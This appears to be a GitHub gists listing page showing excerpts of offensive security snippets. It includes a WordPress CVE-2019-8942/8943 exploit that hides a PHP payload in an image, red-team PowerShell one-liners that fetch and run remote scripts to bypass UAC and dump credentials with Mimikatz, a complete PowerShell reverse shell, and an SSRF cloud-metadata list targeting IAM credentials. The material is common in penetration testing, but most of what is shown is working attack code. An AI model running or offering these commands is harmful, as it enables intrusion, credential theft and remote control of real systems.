icheernoom’s gists

allyshka / wordpress-rce.js

Created March 1, 2019 22:51

WordPress <= 5.0 exploit code for CVE-2019-8942 & CVE-2019-8943

	var wpnonce = '';
	var ajaxnonce = '';
	var wp_attached_file = '';
	var imgurl = '';
	var postajaxdata = '';
	var post_id = 0;
	var cmd = '<?php phpinfo();/*';
	var cmdlen = cmd.length
	var payload = '\xff\xd8\xff\xed\x004Photoshop 3.0\x008BIM\x04\x04'+'\x00'.repeat(5)+'\x17\x1c\x02\x05\x00\x07PAYLOAD\x00\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x00\x00\xff\xdb\x00C\x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06\x07\x07\x06\x08\x0a\x10\x0a\x0a\x09\x09\x0a\x14\x0e\x0f\x0c\x10\x17\x14\x18\x18\x17\x14\x16\x16\x1a\x1d%\x1f\x1a\x1b#\x1c\x16\x16 , #&\x27)*)\x19\x1f-0-(0%()(\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11\x00\xff\xc4\x00\x14\x00\x01'+'\x00'.repeat(15)+'\x08\xff\xc4\x00\x14\x10\x01'+'\x00'.repeat(16)+'\xff\xda\x00\x08\x01\x01\x00\x00?\x00T\xbf\xff\xd9';
	var img = payload.replace('\x07PAYLOAD', String.fromCharCode(cmdlen) + cmd);

HarmJ0y / rbcd_demo.ps1

Last active April 23, 2025 13:30

Resource-based constrained delegation computer DACL takeover demo

	# import the necessary toolsets
	Import-Module .\powermad.ps1
	Import-Module .\powerview.ps1

	# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account
	whoami

	# the target computer object we're taking over
	$TargetComputer = "primary.testlab.local"

seajaysec / customqueries.json

Last active February 12, 2025 16:58

bloodhound custom queries

	{
	"queries": [{
	"name": "List all owned users",
	"queryList": [{
	"final": true,
	"query": "MATCH (m:User) WHERE m.owned=TRUE RETURN m"
	}]
	},
	{
	"name": "List all owned computers",

d3vilbug / frida-get-AES-keys

Created November 2, 2018 06:25

	#!/usr/bin/env python3

	from __future__ import print_function
	import frida
	import sys
	import json
	import time

	def on_message(message, payload):
	if(message['type'] == 'send'):

jivoi / RedTeam_CheatSheet.ps1

Created July 14, 2018 14:52 — forked from m8sec/RedTeam_CheatSheet.ps1

	# Description:
	# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

	# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
	powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"

	# Invoke-Mimikatz: Dump credentials from memory
	powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

	# Import Mimikatz Module to run further commands

jhaddix / cloud_metadata.txt

Last active April 24, 2025 20:06 — forked from BuffaloWill/cloud_metadata.txt

Cloud Metadata Dictionary useful for SSRF Testing

	## AWS
	# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories

	http://169.254.169.254/latest/user-data
	http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
	http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
	http://169.254.169.254/latest/meta-data/ami-id
	http://169.254.169.254/latest/meta-data/reservation-id
	http://169.254.169.254/latest/meta-data/hostname
	http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

ohpe / RS.ps1

Last active October 14, 2024 19:46

PowerShell Reverse Shell

powershell -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('<LISTENERIP>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

bandrel / check_hashes.py

Last active November 5, 2024 06:12

To check for and reveal AD user accounts that share passwords using a hashdump from a Domain Controller

	#!/usr/bin/env python3

	#Purpose: To check for and reveal AD user accounts that share passwords using a hashdump from a Domain Controller
	#Script requires a command line argument of a file containing usernames/hashes in the format of user:sid:LMHASH:NTLMHASH:::
	# ./check_hashes.py <hash_dump>

	import argparse
	import re

	parser = argparse.ArgumentParser(description="Check user hashes against each other to find users that share passwords")

FrankSpierings / ipa-resign.sh

Last active February 13, 2023 02:39

IPA Resigning (Frida Injection) Script (OSX)

	#!/bin/bash

	#
	# Script requires `brew`
	# - `/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"`
	#
	# Variables
	# - $IPA -> Source IPA
	# - $MOBILEPROVISION -> Source embedded.mobileprovision
	# find ~/Library/Developer/Xcode \| grep embedded.mobileprovision

HarmJ0y / PowerView-3.0-tricks.ps1

Last active April 23, 2025 13:20

PowerView-3.0 tips and tricks

	# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
	# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c

	# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
	# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

	# New function naming schema:
	# Verbs:
	# Get : retrieve full raw data sets
	# Find : ‘find’ specific data entries in a data set

ICheer_No0M icheernoom